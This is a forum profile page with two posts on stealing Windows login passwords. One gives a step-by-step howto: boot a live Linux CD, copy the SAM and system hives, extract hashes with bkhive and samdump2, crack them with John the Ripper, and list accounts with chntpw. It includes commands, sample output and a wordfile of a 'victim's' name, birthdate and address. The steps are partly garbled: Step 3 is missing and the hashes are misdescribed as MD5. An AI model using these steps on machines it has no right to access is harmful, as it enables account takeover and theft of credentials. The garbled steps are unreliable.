Dark808

Members
  • Posts: 2
Contact Methods

  • MSN
    lucky.very.lucky@gmail.com
  • ICQ
    0

Profile Information

  • Location
    Marlette, Michigan.

Recent Profile Visitors

473 profile views


  1. Actually this is only the old way I found of doing it. And yes, you could use Cain to grab the hashes, but then the computer would have to have Cain installed on it; sometimes that is not desirable. This is how I would do it: I would boot up to Slax, then just copy the entire SAM and system file to a USB stick or email them, then take them to another computer and recover them using a rainbow table. (You can get Slax at http://www.slax.org/. There is a module that you put onto the CD when you burn it that will give you bkhive, pwdump and john so you can crack the hashes; if you want them, email me at "lucky.very.lucky@gmail.com". But you don't need those if you're just getting the hashes/SAM file; then you can just take the actual SAM and security file.) If you don't want to use Linux, you can (I guess, never tried) use Pwdump3 or 6 or 4 to get the hashes over a network. But if you want to do it to a computer not on a network, you can use a program I found called SAMInside. Just take the exe and put it on your USB stick, run the exe, and copy the hashes displayed on the screen (there's more to it but I'm too lazy to type it right now). I would use rainbow tables, but I have found that every time I try to download one it stops at like 2 gigs or something when left overnight.
  2. Hi all,

     Firstly, this is a HOWTO on getting a Windows password with additional syskey encryption. Recommended only for people who like to do things the hard and slow way. Second, you're doing this on your own behalf; don't use it wrongly or viciously. Have fun (even though it is a very old way of doing it)!

     Step 1: Boot Knoppix S-T-D and get access to Windows

     Put your Knoppix S-T-D CD in your CD-ROM drive and boot up your computer. Make sure that the BIOS is set to boot from the CD-ROM. First, we need some information on the system (press ALT+F5 to open the shell in which we will type every command):

         cat /etc/fstab

     This will output something like this:

         proc /proc proc defaults 0 0
         pts /dev/pts devpts mode=0622 0 0
         /dev/fd0 /mnt/auto/floppy auto user,noauto,exec,umask=000 0 0
         /dev/cdrom /mnt/auto/cdrom auto user,noauto,exec,ro 0 0
         /dev/cdrom1 /mnt/auto/cdrom1 auto users,noauto,exec,ro 0 0
         # Added by KNOPPIX
         /dev/hda1 /mnt/hda1 ntfs noauto,users,exec,ro,uid=knoppix,gid=knoppix 0 0

     Remember that we want to get the Windows logon password, so in most cases you should look for a hard disk with the NTFS filesystem. Take a look at the output above: you will see that there is an NTFS hard disk, '/dev/hda1'. To get access to this drive you have to 'mount' it:

         mount -r /dev/hda1 /mnt/hda1

     The drive 'hda1' is now located in '/mnt/hda1'. Note that you can't write to the NTFS drive, only read.

     Step 2: Get the information needed to crack the password

     Now that we have access to our selected Windows drive we need two files: the SAM and system file. They are located in %WINDIR%\system32\config:

         cp /mnt/hda1/WINDOWS/system32/config/SAM SAM
         cp /mnt/hda1/WINDOWS/system32/config/system system

     The files are now copied to your RAM (from which Knoppix S-T-D normally reads/writes). The 'SAM' file contains the security account information of the system's users, and the 'system' hive has the data to provide a bootkey for syskey (the encryption method).

     The passwords in the SAM are encrypted in MD5 and, on top of that, with the syskey encryption, which Microsoft calls a "complex obfuscation algorithm".

     Step 4: Use programs (Bkhive and Pwdump2) to obtain password hashes

     The programs are now installed and ready to be used. First, we need to get the bootkey to get rid of the syskey decryption of our password hashes:

         bkhive system bootkey

     Second, we use the bootkey and SAM with samdump2 to generate our password hashes in a file:

         samdump2 SAM bootkey > hashes

     Step 5: Crack the passwords

     First of all, note that the process of cracking a password can take hours, even days, if it is complex and long enough. However, it can be done faster, but keep in mind that it differs. Also, there are many programs to use to crack passwords; we will use 'John'. John is preinstalled on Knoppix S-T-D and is free to use. We say that 'Test' is a user on the Windows machine and that the password is 'KANDUSE' (I tried on my own computer with this information). Now to the cracking:

         /etc/john/john -user:Test hashes

     I got the following output:

         Loaded 1 password (NT LM DES [24/32 4K])
         KANDUSE (Test:1)
         guesses: 1 time: 0:00:14:26 (3) c/s: 512664 trying: KHERCUL - KNDRROL

     It took 14 minutes and 26 seconds to crack it on my computer, but it could just as well have lasted 3 minutes or 2 hours or more. Note that if there is more than one user on the computer you can exclude the '-user:Test' part if you want John to crack every password at once. If you have some words that you would like it to check for first, we can use a 'wordfile'. A wordfile contains words to search for. Example of a wordfile:

         victimsname
         victimsbirthdate
         victimsaddress
         ... etc.

     You only put one word on each line and you can set as many as you would like. Now we want to use the wordfile, so we simply put in the parameter "-wordfile:filename". Like this:

         /etc/john/john -wordfile:my_file password_file

     This will speed up the process if you have some good ideas of what the password could be. If you missed what the cracked password was, you can use this command to request it:

         /etc/john/john -show password_file

     This will show something like this (I filtered it a bit):

         [Username]:[Password]:(additional information here)
         x password cracked, x left

     It is also good to know that if John cracks a password longer than 8 characters it will break it into two parts. Like this:

         Loaded x password (NT LM DES [24/32 4K])
         12345678 (Test:1)
         9 (Test:2)
         guesses: x time: x:xx:xx:xx (x) c/s:xxxx trying: xxxxx - xxxxx

     If you don't know the user names for the computer (and in most cases you probably don't) you can make 'chntpw' list them for you:

         chntpw -l SAM

     This will generate something like this:

         chntpw version 0.99.1 030126, (c) Petter N Hagen
         Hive's name (from header): <\SystemRoot\System32\Config\SAM>
         ROOT KEY at offset: 0x001020
         Page at 0x9000 is not 'hbin', assuming file contains garbage at end
         File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
         Used for data: 337/29520 blocks/bytes, unused: 11/2992 blocks/bytes.

         Hello, this is SAM!
         Failed logins before lockout is: 0
         Minimum password length : 0
         Password history count : 0
         RID: 01f4, Username: <Administrator>
         RID: 03f4, Username: <Test>

         Hives that have changed:
          #  Name
         None!

     Above we used the user 'Test', which is located here in the output:

         RID: 03f4, Username: <Test>

     To show that password cracking could take less time, we try setting a password on your Knoppix S-T-D to crack. Type:

         passwd knoppix

     The system now requests a password; type 1234. Then retype when asked. Now we need to dump it to a file so it can be cracked, and use John to do it:

         /etc/john/unshadow /etc/passwd /etc/shadow > crack.this
         /etc/john/john crack.this

     This should not take that long because it is a very easy password to crack. You will see an output much like this:

         Loaded 1 password (Standard DES [24/32 4K])
         1234 (knoppix)
         guesses: 1 time: 0:00:00:00 100% (2) c/s: 3024 trying: 12345 - robert

     This is an approach on how to retrieve a password for Windows. I hope someone will find this easy enough to understand and helpful. Remember!! Only use this if you e.g. lose your own password or if you need to help your friend.